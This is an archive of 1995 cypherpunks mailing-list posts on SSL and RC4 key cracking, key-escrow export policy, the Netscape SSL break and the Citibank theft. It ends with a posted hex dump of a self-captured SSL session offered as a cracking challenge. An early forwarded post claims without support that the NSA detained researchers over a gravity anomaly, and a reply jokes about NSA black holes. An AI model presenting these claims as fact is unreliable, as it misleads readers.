From: Albert Nanomius <nanomius@netcom.com>


- ------- Forwarded Message

Date:  Thu, 17 Aug 1995 17:03:00 -0500 
From: "chris (c.) currivan" <currivan@bnr.ca>
To: snet-l@world.std.com
Subject:  NSA and science 

A post from alt.conspiracy:

Francis E. Decstation <fed@cca.org> wrote:
>
>On July 19, Gerald Ollman and Robert Wayne, two researchers from the
>University of Maryland geophysics department were detained in Fort Meade,
>Maryland, apparently by agents of the National Security Agency, whilst
>taking measurements of the Earth's gravitational field. After 18 hours of
>questioning, they were released after being instructed not to discuss the
>incident. Their equipment and results were not returned.
>
>Neither the University nor the NSA has commented on the incident. However,
>it is believed that Ollman and Wayne were investigating a slight anomaly
>in the Earth's gravitational field centered around Fort Meade. No reason has
>been given for their detention.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Fri, 18 Aug 95 19:42:20 PDT
To: cypherpunks@toad.com
Subject: Time-memory tradeoff in SSL's RC4 code?
Message-ID: <01HU8H23AHQQ8ZJ4DW@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 17 Aug 1995 08:32:56 -0400
>From: "Perry E. Metzger" <perry@piermont.com>
>Subject: Re: SSL challenge -- broken !

>It has occured to me that, because the RC4 key crackers spend most of
>their time in key setup, you can crack N SSL sessions that you
>captured in not substantially more time than it took to crack 1. This
>is analagous to the way brute force Unix password file hacking operates.

This would work with straight 40-bit keys, but I believe SSL uses
128-bit keys, and then intentionally leaks 88 bits to comply with
export requirements, to prevent this kind of attack from working.

>Perry

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDVGXUHx57Ag8goBAQFyUQP7B7fhKc8AqpcHnQ09ip5gOfy5QMCtGImB
f1Y9lZtAmLFwOIkrfdaL2vCWJKIKc7yg8+FwtmX6Q8yYWH4TdE5eWOGIKSfl5Q8f
etVgF2B49T5Lxxb02ah5cHfO8baOqQOTMkvzQ9bj0XVqAItPoPjDTCOAAegwKZ3V
6L+kZQn89lY=
=KkAX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Fri, 18 Aug 95 20:04:12 PDT
To: cypherpunks@toad.com
Subject: Export policy change
Message-ID: <01HU8HT0PYIQ8ZJ4DW@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 17 Aug 1995 23:48:01 -0400
>From: Rich Salz <rsalz@osf.org>
>Subject: Export policy change

>Just heard on the 11:30pm NPR news update.  The Clinton Administration
>has changed the crypto export policy.  You will now be allowed to
>export strong crypto, provided it is a key escrow system.  The
>reporter (Dan Charles?) said something like anyone can hold the keys,
>as long as they will be made avail when presented with a court order.
>He also said, US citizens will still be able to use strong crypto
>without key escrow internally.  Terrorists and drug pushers were given
>as "reasons."

I think this is an important and somewhat subtle political move on
the part of the administration.  If they can get at least a few
large businesses (the ones who buy into the key-escrow scheme) on
their side, by making it in their economic interests for everyone
to use escrowed crypto, they will have manufactured some
potentially powerful allies in the computer industry.  Certainly,
once any major company has spent a lot of money to set up a key
escrow facility, they will help lobby *against* any easing of the
requirement to use escrowed crypto, based simply on self-interest.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDVGZUHx57Ag8goBAQEutQQAmM/qEIAlLklDRW/FVvLah7vgY6lYcCK/
XToA79tVZNmy+8U/XjS2g6+Ffsc/gQflOdg/ZmewDOQRJ4YI+BzHUjKL5NVDWAUA
/4+ySWxcAAEOD23GhS9p/iFN/Gbe0oV9JIQ2HCpPN929VaRl7J+1fWA/ETZkB914
ClJPlXqa1xo=
=XefF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Fri, 18 Aug 95 20:04:41 PDT
To: cypherpunks@toad.com
Subject: Anonymous certificates
Message-ID: <01HU8HTP8R4O8ZJ4DW@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Fri, 18 Aug 1995 14:47:55 -0400 (EDT)
>From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
>Subject: Certificates/Anonymity/Policy/True Names

>Now the issue arises as to whether one should allow the CA
>to issue certificates to pseudonyms where it has *no record* of the real
>identity of the person proffering the key pair.
>Is there any reason why a person would want such a certificate?  In other
>words, given that the recipient of a digital signature will easily be
>able to check the value of the certificate (nil), won't the
>transaction/communication be in all ways identical to one where there was
>no certificate at all.
>So is anything of value lost by prohibiting such
>a certificate?

There are definitely cases where something is lost by prohibiting
that kind of certificate.  For example, there may be cases where a
certified key gives someone some right that doesn't need any
further identification, such as a right to run up $100 in phone
bills, or a right to receive a year's subscription to cp-lite.  As
long as the person has paid for that right, who cares who he or she
is?  In other words, you may wind up sometimes binding a key to a
function, rather than a person.

>A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
>Associate Professor of Law | mfroomki@umiami.ir.miami.edu
>U. Miami School of Law     |
>P.O. Box 248087            | It's hot here.  And humid.
>Coral Gables, FL 33124 USA |

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDVGbUHx57Ag8goBAQHO/AP+IM1YQSXZWaysjDALtOljqUEiyiCBA3EM
Wxd8dp0dVrXKEii1Ima/xLHMKY4P0fvwT3oQl4x+mMo+ED2lNHo5GOUhgkE1tOZ8
6JfnUS6+l1Y4r14Aq0eMLljrOKFBDDUxewJTRaz36awWNr9W0tEcnnKv9NwQMU//
CCKR6L5fekI=
=EI6V
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 18 Aug 95 15:06:41 PDT
To: cypherpunks@toad.com
Subject: WhiSSLing in the Dark
Message-ID: <199508182201.AAA27435@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Netscape Encrypted Data Cracked


Tokyo, Japan, Aug. 18 (NB) -- Two computer users have
managed to break Netscape's Secure Sockets Layer (SSL)
encryption code in response to a challenge posted to the
Internet. But far from scaring people away from using the
system for online purchases, the results could reassure
people of the safety.

In mid July Hal Finney, a US computer user, posted data
in an Internet message that he recorded when he sent an
order, containing a fake name and credit card details, to
Netscape's own computer. Setting a task for the hacking
community, he wrote, "The challenge is to break the
encryption and recover the name and address info I
entered in the form and sent securely to Netscape."

Early this week, news came from Damien Doligez, a French
computer user, that he had cracked the code and revealed
the contents of the message. Several hours later a
message from an American team also claimed the same feat,
actually cracking it two hours earlier than Doligez.

While the results look damaging on the surface, Netscape,
and Doligez, pointed out the amount of computer
processing power needed to hack just one message and the
difficulty in repeating the process.

Roseanne Siino of Netscape told Newsbytes, "The real
issue is whether this compromises security on the net. He
used 120 computers for 8 days just to crack one message."
Siino points out that to break into another message would
require another eight days at the same 120 workstations
and 2 parallel computers.

In home computer terms, Doligez guesses a network of
about 80 Intel Pentium-based machines would be equivalent
to the system he had access to via his workplace, INRIA
in Paris, and computers an Ecole Polytechnique and ENS.

Netscape estimates the total cost of this computing time
at around $10,000, meaning there are many more economical
ways of getting credit cards numbers than hacking into
Netscape SSL messages.

Doligez agrees, writing on his home page: "The technical
implications are almost zero. Everybody who understands
the technical details knew perfectly well that this was
do-able and even easy. You have to understand what
happened exactly. I did not break SSL itself. I did only
break one SSL session that used the weakest algorithm
available in SSL. If I want to break another session, it
will cost another 8 days of all my machines."
The vulnerability of the encryption system is shown by
its international use. The coding system available via
Netscape software from the Internet makes use of a 40-bit
encryption key. A stronger version, using a 128-bit key,
is available to US citizens but restricted from export
outside the United States by government regulations.

Netscape's Siino explained the US government allows
export of the lower security version "because they can
break it."

There are some hopes that this demonstration will help
persuade the US government to lift export restrictions on
some harder-to-crack versions of the code.

Netscape is currently developing a new Secure Courier
code which just encrypts the financial data in the
messages using 56-bit keys. Siino explained, "You can
export over 40-bit keys for a specific application." The
new system should be available early next year.

Many companies working on secure transaction systems hope
the much more secure 128-bit code version of the system
will be available for export eventually. This is said to
be almost unbreakable, requiring a trillion times more
processing power to crack than the 40-bit version.

Internet users can view a copy of the original challenge,
access Doligez's home page with details of his result,
get copies of the program used to crack the code and read
Netscape's response to the news through a special section
at Netscape,

http://home.netscape.com/newsref/std/key_challenge.html

Press contacts : Roseanne Siino, Netscape,
+1-415-528-2619 , Internet email roseanne@netscape.com;
Damien Doligez, Internet email damien.doligez@inria.fr ;
Hal Finney, Internet email hfinney@shell.portal.com)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 19 Aug 95 01:02:31 PDT
To: cypherpunks@toad.com
Subject: Re: Economic Model for Key Cracking
Message-ID: <199508190800.BAA26793@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:29 PM 8/18/95 -0600, howard@cs.ualberta.ca wrote:
> Distribute work when a request is received.
> When the final results come back, pay the worker e-cash.
>
>We need to make sure that someone did do the work honestly, but I don't know
>how to check this (other than doing the work yourself to confirm the results,
>but this defeats the whole point of the system). 

For the usual NP-hard problems, including keycracking, checking the answer
once you have it is easy - the hard part is finding the answer.
Another way to look at it is that most of the work is throwing away the
2**N-1 keys that aren't correct, and if you've got one correct key you don't
need to know about the rest (except in special cases where there are multiple
keys that work, but usually you don't care about that.)

Most people are honest, except Bad Guys.  

The honesty problem is more serious for negative results - if somebody says
"Range N1-N2 doesn't have the key", they could be honest, or they could
be a Bad Guy who knows that the key really _is_ in that range and wants
to prevent you from searching it, or they could be a scammer who wants to
get paid for searching but didn't actually do the work.  If people are
willing to be paid in lottery-mode (only the person who finds they key gets
paid),
then honesty's not a problem.  Otherwise, only hire honest people (plus Bad
Guys),
and if they don't find the key after the first sweep, try again (switching off
ranges so one Bad Guy doesn't get to lie about the same range twice.)

Alternatively, you could do a model where everybody gets paid, but only after
the answer is found, which discourages scammers (since they don't get paid if
they lie about searching the range that has the real key.)  If a Bad Guy lies
about the key not being in his range, people do have an incentive to look for it
if the first pass fails, and have an incentive to finger him if they do find 
the key on a later pass.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 19 Aug 95 01:02:33 PDT
To: cypherpunks@toad.com
Subject: Re: Exportable if Escrowed
Message-ID: <199508190800.BAA26798@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


PGP inherently provides master-key service, which can be used for escrow.
On a normal PGP message, there's a session key which the sender knows,
and a copy of the session key is provided to the recipient, who can open
it on the condition that he has the genuine private key.  That's fairly
close to _real_ escrow - it's certainly closer than Clipper's Master-Key stuff.
(And it has a lot more masters :-)

If PGP message-senders want to do so, they can use multiple recipients
on a given message, so the key is accessible to a third party trusted by
the sender (the legitimate recipient already can give it to trusted parties.)
(Typically a sender might use encrypt-to-self to retain the key for later use.)

An amusing feature to add to PGP (using the 3.0 toolkits when available)
would be a session-key-splitting feature, which uses Shamir M/N sharing or
a simple two-way split and encrypts the splits with different people's
public keys,
so that you could give them to semi-trusted parties.

Of course, the Clintonites' proposal of "Well let you use slightly less wimpy
encryption in return for GAK" is really offensive - if they've got GAK,
it doesn't matter if they keys are 64000 bits long, since they'll have them.
Smokescreen.

On the other hand, master GAK keys don't fit well into a Web of Trust -
you'd essentially have to require that people only send mail to keys that are
signed by an escrow service, and people wouldn't always do that if they had
a choice - to enforce GAK, you either need to limit the sender's encryption
software (unrealistic) or the recipient's decryption software (unrealistic),
probably by requiring exportable products to use a specific hierarchical
key-service.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Sat, 19 Aug 95 01:49:29 PDT
To: "cypherpunks@toad.com>
Subject: NSA's black hole event detector
Message-ID: <199508190849.BAA25410@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

>On July 19, Gerald Ollman and Robert Wayne, two researchers from the
>University of Maryland geophysics department were detained in Fort Meade,
>Maryland, apparently by agents of the National Security Agency, whilst
>taking measurements of the Earth's gravitational field. 

So, the NSA has a microscopic black hole they're modulating with a fine
particle stream, so gravity wave detectors can receive messages through 
the Earth using hyper-amplified optical data cubes. These messages 
could not be jammed by e-m waves (OK, terawatts at the receiver maybe).

According to Communications Quarterly, such black hole events could 
arguably support a compressed real-time digital voice channel. This 
sounds like the "heavy hand" devices in the new Free Space 
science-fiction anthology.

What? You haven't read it? Neither has anyone else, but when it finally
comes out you'll get to read my story about blue helmeted Earth Union
troops battling a neo-Confederate militia 20 years after the War of 
Annexation. Nanotech weapons, makeshift missiles, home-brew spacecraft.

An important part of a balanced breakfast.

Kent
--
"Put pages for your business on the World Wide Web, just $5 per month!"
J. Kent Hastings -- zeus@pinsight.com -- http://www.pinsight.com/~zeus/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 18 Aug 95 18:40:09 PDT
To: cypherpunks@toad.com
Subject: Red Shift
Message-ID: <199508190140.DAA01774@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Citibank Theft


New York (AP) -- Russian computer hackers broke into a Citibank
electronic money transfer system and stole more than $10 
million
before they were caught, according to newly-unsealed court
documents. The money was shifted from Citibank to accounts in
Finland, Russia, Germany, the Netherlands, the United States,
Israel and Switzerland, FBI agent Steven Garfinkel said. 
Citibank
said six people have been arrested in the scheme and that none 
of
its clients lost money.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 19 Aug 95 03:40:26 PDT
To: cypherpunks@toad.com
Subject: So, NSA can break 64-bit keys
Message-ID: <199508191040.GAA20763@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


The WSJ article on Clipper II (The Next Day) was the best one.  Particularly
this line:

"Clint Brooks, a technical advisor with the NSA [said] that continued
[64-bit] limits [on key length] were needed because officials were "uneasy"
about the possibility that software could be altered so that the key would
no longer be accessible to law-enforcement officials."

This must mean that the Feds figure that by the time this turkey gets around
to actually flying (sometime well after the Clinton administration), 64-bit
keys will be (are) vulnerable.

I guess this means no source code.  Are there any software encryption
systems that can't be modified after the fact?

DCF

"Course, the source code could be released after key escrow has occured."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 19 Aug 95 04:36:27 PDT
To: cypherpunks@toad.com
Subject: HAQ_kof
Message-ID: <199508191136.HAA02404@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-19-95. NYPaper:


   Whitfield Diffie OpEd: "Washington's Computer Insecurity."

      The Federal Government has refused to allow companies to
      export strong encryption systems, insisting that
      cryptography is a military weapon. If the Administration
      does not fundamentally alter its position, it is likely
      that our high-tech industries, which sell more than half
      their products outside the country, will continue to be
      forced to sell programs with weak security systems. This
      will pave the way for foreign companies to grab what is
      expected to become a huge market for properly
      safeguarded computer communications.


   "Citibank Fraud Case Raises Computer Security Questions."

      A $10 million computer fraud against Citibank appeared
      to be the first successful penetration by a hacker into
      the systems that transfer trillions of dollars a day
      around the world's banks. New details of the case were
      disclosed as a Federal complaint was unsealed in
      Manhattan. The hackers were accused of breaking into
      Citibank's cash management system, a network that allows
      its corporate customers to transfer money to any bank
      account in the world. Banking experts said similar
      breakins were bound to occur at a time when more
      powerful personal computers are available. Since the
      break-in, Citibank has required customers to use an
      electronic device, that creates a new password for every
      transfer.


   Two: HAQ_kof (11kb)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 19 Aug 95 08:28:19 PDT
To: cypherpunks@toad.com
Subject: SSL Challenge #2
Message-ID: <199508191525.IAA16924@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


OK, here is another "SSL challenge" for your cracking pleasure.  I hope
this time people will be able to put together more of a group effort to
show how large numbers of less powerful machines can crack these keys.

I am leaving for a week in the Colorado mountains in a few hours so I
don't have time now to format this nicely.  However the necessary
information should all be here.

This one includes a fake credit card number as well as other fake
information.  As with the earlier challenge, this is all data I created
myself and captured using the actual Macintosh Netscape browser.

Note that the breakdown by messages is based on the packetizing done in
the TCP communication.  There may not be an exact correspondence between
these packet breakpoints and the "logical packets" used in the SSL
transaction.  Particularly for the long sequence of packets which come
back from the server towards the end (because it rejected the transaction
so is re-sending the form data, I think) you will need to check the SSL
length fields to see where the SSL packets start and end.  I am not sure
why there is so much data sent from the server at the end, but whomever
cracks it can presumably find out.

Good luck!

August 19, 1995
Hal Finney




First message from client

0x80 0x1c 0x01 0x00 0x02 0x00 0x03 0x00 0x00 0x00 0x10 0x02 0x00 0x80 0x07 0xea
0x7b 0x9d 0x65 0xeb 0x61 0xfa 0xbb 0x41 0x74 0xe8 0x45 0x3a 0x5f 0xc6 

first message from server

0x82 0x14 0x04 0x00 0x01 0x00 0x02 0x01 0xf6 0x00 0x03 0x00 0x10 0x30 0x82 0x01
0xf2 0x30 0x82 0x01 0x5b 0x02 0x02 0x01 0x8a 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48
0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x30 0x47 0x31 0x0b 0x30 0x09 0x06 0x03
0x55 0x04 0x06 0x13 0x02 0x55 0x53 0x31 0x10 0x30 0x0e 0x06 0x03 0x55 0x04 0x0b
0x13 0x07 0x54 0x65 0x73 0x74 0x20 0x43 0x41 0x31 0x26 0x30 0x24 0x06 0x03 0x55
0x04 0x0a 0x13 0x1d 0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d
0x6d 0x75 0x6e 0x69 0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70
0x2e 0x30 0x1e 0x17 0x0d 0x39 0x35 0x30 0x37 0x31 0x31 0x32 0x32 0x34 0x31 0x34
0x35 0x5a 0x17 0x0d 0x39 0x37 0x30 0x37 0x31 0x30 0x32 0x32 0x34 0x31 0x34 0x35
0x5a 0x30 0x7f 0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x06 0x13 0x02 0x55 0x53
0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x08 0x13 0x02 0x43 0x41 0x31 0x16 0x30
0x14 0x06 0x03 0x55 0x04 0x07 0x13 0x0d 0x4d 0x6f 0x75 0x6e 0x74 0x61 0x69 0x6e
0x20 0x56 0x69 0x65 0x77 0x31 0x26 0x30 0x24 0x06 0x03 0x55 0x04 0x0a 0x13 0x1d
0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d 0x6d 0x75 0x6e 0x69
0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70 0x2e 0x31 0x23 0x30
0x21 0x06 0x03 0x55 0x04 0x03 0x13 0x1a 0x45 0x2d 0x53 0x74 0x6f 0x72 0x65 0x20
0x54 0x72 0x61 0x6e 0x73 0x61 0x63 0x74 0x69 0x6f 0x6e 0x20 0x53 0x65 0x72 0x76
0x65 0x72 0x30 0x5c 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01
0x01 0x05 0x00 0x03 0x4b 0x00 0x30 0x48 0x02 0x41 0x00 0xc7 0x24 0x0d 0xbd 0xfe
0x5f 0x21 0x09 0xb4 0x46 0x12 0xbb 0xc7 0x4c 0xbc 0x0c 0x98 0xe3 0x11 0x19 0x60
0x85 0x86 0x0a 0xa2 0xaf 0xae 0x8f 0xf9 0x43 0x86 0x92 0x1f 0xcc 0xd3 0x38 0xcf
0x92 0x14 0xa7 0x8c 0x89 0x07 0x26 0xd4 0x21 0x55 0xa8 0x43 0x2d 0xb4 0xec 0xce
0x24 0x73 0x5e 0x7c 0xe2 0xbe 0x22 0x2d 0xbd 0x96 0xbf 0x02 0x03 0x01 0x00 0x01
0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x03
0x81 0x81 0x00 0x8f 0xbe 0x0c 0xae 0xc8 0xf0 0x22 0xef 0xae 0x83 0xb5 0xb1 0xe3
0xb4 0xd9 0xd6 0xa9 0x4a 0xb6 0x60 0x9c 0x0b 0x00 0x70 0x12 0x88 0x73 0xd1 0xef
0xe2 0x54 0xf6 0x3a 0xc7 0xa5 0xbe 0xe1 0xe0 0xdb 0x4d 0x20 0x10 0x3d 0x68 0x7c
0x8d 0xdb 0x16 0xf6 0x67 0xe7 0x1d 0x51 0xbc 0x19 0xa2 0xf6 0xbf 0x6f 0xa4 0x52
0xc7 0x7e 0x50 0x3d 0xb9 0x3e 0x1e 0x67 0xff 0xf6 0xf2 0x5d 0xe7 0x2b 0x7e 0x3a
0x7e 0x6c 0x40 0xb7 0x04 0x9c 0x2c 0x2b 0x89 0x0f 0x8c 0xb5 0x93 0xd8 0xac 0x94
0xe6 0x5f 0x84 0xe8 0x71 0x75 0x9e 0x10 0x6e 0x36 0xe6 0x14 0xfe 0xba 0xf8 0x11
0x71 0x9d 0x74 0x33 0x48 0x74 0xc1 0xba 0xcb 0xff 0x58 0x86 0x8c 0xba 0x9c 0x08
0xad 0xce 0x8a 0x02 0x00 0x80 0xd5 0xe6 0x38 0xd6 0x8c 0xa8 0xa1 0xae 0xca 0x2e
0xf8 0xc8 0xe2 0x96 0x02 0xa4 

Second message from client

0x80 0x55 0x02 0x02 0x00 0x80 0x00 0x0b 0x00 0x40 0x00 0x00 0xfb 0xc0 0x09 0x91
0x60 0x10 0xa6 0x15 0x3f 0x8f 0x36 0x5a 0x19 0x06 0x8e 0x58 0xc4 0xfa 0xd0 0x73
0xd4 0x6d 0x20 0x97 0x2f 0x85 0x95 0xb3 0xa5 0x97 0xb5 0xe0 0x63 0x91 0x61 0xb7
0x76 0x3c 0x4e 0x62 0x8b 0x02 0x2b 0x05 0x98 0xd4 0x14 0x44 0x63 0xf3 0x43 0x7e
0xa0 0xa8 0x3f 0x16 0xb2 0x43 0x4b 0x24 0x76 0xae 0xba 0x8c 0x89 0x71 0xde 0x25
0x6b 0xce 0x89 0x77 0x8a 0x30 0x2a 

Second message from server

0x80 0x21 0x9a 0xc5 0xf7 0xd1 0x6a 0x5b 0x26 0x43 0x57 0x67 0x65 0xb6 0x3f 0x9a
0xe3 0x82 0x00 0x65 0x99 0xb6 0xd2 0xf2 0xa7 0x36 0xa0 0x7d 0xd9 0x94 0xcf 0xe2
0x33 0xb2 0x1b 

Third message from server

0x80 0x21 0x38 0x4f 0x4d 0x99 0x31 0x33 0xc9 0x72 0x0f 0xf9 0xb7 0x7f 0xd4 0x02
0x4b 0x4a 0x3b 0xdb 0x4f 0xc9 0x04 0xa4 0x09 0xd1 0x04 0xbe 0xee 0xb0 0xe6 0xed
0x7f 0x18 0x17 

Third message from client

0x80 0x21 0x98 0xdb 0x86 0xf2 0xe0 0x67 0x8a 0x2f 0x04 0x5b 0xf3 0xf0 0x78 0xe1
0x96 0x83 0x34 0x38 0x2f 0x22 0x45 0x61 0xa0 0xac 0x7d 0x9f 0xa8 0xcc 0x16 0xec
0xd7 0x33 0xb9 

Fourth message from client

0x83 0x64 0x05 0x8e 0x95 0x38 0x40 0xca 0x91 0xb7 0x6f 0xc5 0x48 0x33 0x0c 0xf0
0xde 0x75 0x7d 0x41 0x08 0x23 0xe4 0xd8 0x0c 0x63 0x31 0x20 0x54 0xae 0xd9 0x4f
0x3f 0xc6 0x1c 0xbb 0x55 0xe3 0x6b 0xdd 0x8e 0x10 0x5a 0x40 0x3a 0x01 0xd6 0x35
0x35 0x3b 0x0c 0x5b 0x0f 0x22 0xb2 0x30 0x37 0x00 0x6c 0x3f 0x3f 0xa5 0x80 0x45
0xf8 0xe4 0x8d 0x0d 0x5d 0x4d 0x97 0xc8 0x4d 0xb5 0x23 0x7c 0x26 0xa2 0x63 0xeb
0xbb 0xbb 0x27 0xbd 0x72 0x64 0x18 0x97 0x0f 0x11 0x0c 0x22 0xc6 0x84 0xff 0x26
0x87 0x56 0x41 0x9c 0x48 0x48 0x51 0xc6 0x35 0xe1 0xff 0x85 0xf4 0xf4 0xfb 0x6e
0xba 0xcb 0x4c 0x2a 0xf1 0x18 0x5e 0xa3 0x24 0xb2 0xfd 0xf6 0x33 0x0c 0xc8 0x66
0x90 0x0c 0x80 0x72 0xbe 0x8c 0x2d 0x66 0xff 0xd3 0x11 0x5f 0x3c 0x9d 0x0f 0xe5
0x8a 0x39 0x4b 0x5e 0x05 0xde 0xd7 0x2c 0xfe 0xe7 0x15 0x96 0xbc 0xa8 0x2a 0x45
0x55 0x84 0xb4 0xb7 0xdc 0x6f 0x1b 0x89 0x88 0xd0 0x39 0xd7 0xff 0xad 0x3e 0x54
0x19 0xf8 0x7a 0x46 0x15 0x18 0x2b 0xd5 0x2e 0x69 0x61 0x83 0x4c 0xc1 0x52 0xd2
0x9d 0x22 0xa8 0x75 0x79 0x7b 0x95 0xf6 0x1d 0xf8 0xab 0x9f 0xf2 0xf5 0xf1 0xb7
0x42 0x2e 0xf6 0x17 0x43 0xc5 0x36 0x09 0x35 0x4b 0xeb 0xf6 0x39 0x45 0x5f 0xe2
0xdc 0x5c 0xa2 0x2b 0xee 0x1f 0x58 0xac 0xc1 0x92 0x63 0xe7 0xa7 0x5a 0xaf 0x85
0x40 0xbe 0x10 0x9c 0x96 0x18 0xeb 0x01 0xc4 0xb9 0x9f 0x49 0x76 0x04 0xe0 0xe8
0xda 0xcc 0x69 0x12 0x4d 0x2f 0x8f 0x53 0x2a 0xe0 0x07 0x15 0x41 0x4e 0xe8 0x88
0x92 0xdf 0x4e 0x67 0xdf 0xc4 0x42 0xe5 0xcb 0x6d 0x30 0xaf 0x62 0x0e 0xe1 0x4b
0x6c 0x33 0x01 0x6c 0xf6 0x66 0x0b 0xee 0x83 0xdd 0x00 0x7b 0xbb 0xad 0x9b 0x95
0xc0 0x2d 0xa1 0xfd 0x8b 0x41 0x13 0x70 0x87 0x1f 0xd9 0x3a 0x45 0x1b 0xcb 0xec
0x1b 0x61 0x41 0x62 0x50 0x8f 0x64 0xbc 0x8f 0xa9 0x2e 0x14 0x7c 0x75 0xff 0xb6
0x82 0x61 0x10 0x8f 0xad 0x27 0xa5 0x51 0xc6 0x2c 0x45 0x0f 0x52 0x27 0x3b 0x6c
0xb2 0x70 0xfa 0x3e 0x57 0xd9 0x16 0x91 0x0a 0xa5 0xd9 0xe4 0x1d 0xc0 0x7e 0x5f
0x5e 0xae 0x26 0xda 0x36 0x36 0x15 0x91 0x40 0x6c 0x6d 0x4a 0x51 0x9a 0x02 0x54
0x84 0x6b 0x1b 0xd5 0xa3 0xda 0x48 0xea 0x22 0x58 0xad 0xbe 0x65 0x25 0xfd 0x98
0x59 0xbb 0x00 0x06 0x32 0x3f 0xc3 0xfb 0x3a 0xb2 0x91 0x9e 0x25 0x8a 0x73 0x39
0xc1 0xeb 0xac 0x99 0xcf 0x5f 0xef 0x2b 0x57 0x05 0x8c 0x06 0xc5 0xd0 0x48 0x3b
0xad 0xc3 0xdb 0x83 0xdc 0xa0 0x00 0x3b 0xaf 0xfa 0x06 0x6a 0x0c 0xbd 0xe3 0x7a
0xd7 0x7c 0x00 0xcc 0xce 0xd1 0x0f 0xf6 0xc1 0x1a 0xa5 0x58 0x7d 0xa6 0xc4 0x55
0x2e 0xc2 0x7d 0x26 0x61 0x7e 0x8c 0x3a 0x9e 0xd6 0xb2 0x16 0xa9 0x39 0x6f 0x55
0x47 0x4c 0x67 0x5d 0x6b 0xc7 0xea 0xcc 0xde 0x17 0x5d 0x22 0x1d 0x0f 0xba 0x66
0x0e 0x9e 0x2b 0x6f 0x75 0xe7 0x1b 0x7a 0x86 0xbb 0x7f 0x6c 0x5b 0xa0 0x7b 0xe4
0xcb 0x55 0x8b 0xe2 0x38 0xf2 0x86 0x24 0x77 0xc2 0x8b 0x80 0xb3 0xb8 0xb7 0x1e
0x29 0x1f 0x3e 0x63 0xee 0x39 0x4f 0x4f 0x48 0x2a 0x9b 0xd2 0xcc 0xe4 0xaa 0xdd
0x73 0x5a 0x6e 0xd3 0x2d 0xb0 0x4f 0xe6 0xf1 0xc3 0xd9 0x5b 0xee 0xb6 0xfe 0xd4
0x92 0x37 0x5d 0xa6 0x5a 0xe3 0x11 0x71 0x76 0x0a 0x8b 0x9a 0xeb 0xe3 0x13 0x38
